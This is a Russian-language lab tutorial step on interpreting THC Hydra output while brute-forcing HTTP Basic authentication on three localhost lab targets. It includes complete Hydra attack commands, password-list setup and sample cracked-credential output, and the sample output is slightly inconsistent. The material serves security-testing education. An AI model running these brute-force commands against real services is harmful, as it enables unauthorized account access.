Проверка вывода для нескольких хостов
В этом шаге вы научитесь интерпретировать вывод Hydra при атаке на несколько HTTP-целей. Вывод Hydra предоставляет ценную информацию об успехе или неудаче попыток атаки на разных веб-сервисах.
Когда Hydra успешно взламывает пароль HTTP-аутентификации по основанию, она отображает учетные данные в следующем формате:
[<порт>][http-get] host: <хост> login: <имя_пользователя> password: <пароль>
Например:
[8081][http-get] host: 127.0.0.1 login: admin password: password123
Это указывает, что Hydra успешно взломала HTTP-аутентификацию по основанию для пользователя admin на хосте 127.0.0.1 на порту 8081 с паролем password123.
Давайте проанализируем вывод HTTP-атак и поймём, что означают разные результаты.
-
Запустите полную команду Hydra ещё раз, чтобы увидеть весь вывод:
cd ~/project
hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get /
-
Изучите подробный вывод. Вы должны увидеть результаты для всех трёх целей:
Ожидаемый полный вывод:
Hydra v9.x (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-XX-XX XX:XX:XX
[DATA] max 8 tasks per 1 server, overall 24 tasks, 60 login tries (l:4/p:5), ~3 try per task
[DATA] attacking http-get://127.0.0.1:8081:80/
[DATA] attacking http-get://127.0.0.1:8082:80/
[DATA] attacking http-get://127.0.0.1:8083:80/
[8081][http-get] host: 127.0.0.1 login: admin password: password123
[8082][http-get] host: 127.0.0.1 login: user password: secret
[8083][http-get] host: 127.0.0.1 login: testuser password: password
1 of 3 targets completed, 3 valid passwords found
Hydra finished.
-
Чтобы увидеть, как выглядят неудачные попытки, создадим сценарий с неверными учетными данными. Создайте новый файл паролей с в основном неправильными паролями:
echo "wrongpass" > wrong_passwords.txt
echo "badpass" >> wrong_passwords.txt
echo "password123" >> wrong_passwords.txt ## Только один правильный пароль
-
Запустите Hydra с подробным выводом, чтобы увидеть как успешные, так и неудачные попытки:
hydra -L users.txt -P wrong_passwords.txt -t 4 -v -M targets.txt http-get /
Вы увидите подробный вывод, показывающий успешную попытку:
... (вывод, аналогичный предыдущему примеру)
-
Сохраните результаты в файл для последующего анализа:
hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get / -o hydra_results.txt
Проверьте файл результатов:
cat hydra_results.txt
Как интерпретировать результаты HTTP-атак:
- Успешные атаки: Строки, начинающиеся с
[порт][http-get], показывают успешное обнаружение учетных данных.
- Информация о цели: Каждый успешный результат показывает точный хост, порт, имя пользователя и пароль.
- Статистические данные: Последняя строка показывает, сколько целей было атаковано и сколько было найдено правильных паролей.
- Неудачные попытки: В режиме подробного вывода вы можете увидеть каждую неудачную попытку входа.
- Файлы вывода: Использование
-o сохраняет только успешные результаты в файл для простого анализа.
Ключевые различия от других протоколов:
- HTTP-атаки показывают номер порта чётко в результатах.
- Время отклика обычно быстрее, чем при атаках на SSH.
- Несколько областей аутентификации на одном сервере будут отображаться как разные цели.
- HTTP-коды состояния (например, 401, 403) предоставляют дополнительный контекст о неудачах.
В этом шаге вы научились интерпретировать вывод Hydra при атаке на несколько HTTP-целей, понимать разницу между успешными и неудачными попытками и сохранять результаты для анализа. Эти знания имеют решающее значение для эффективного тестирования безопасности веб-приложений.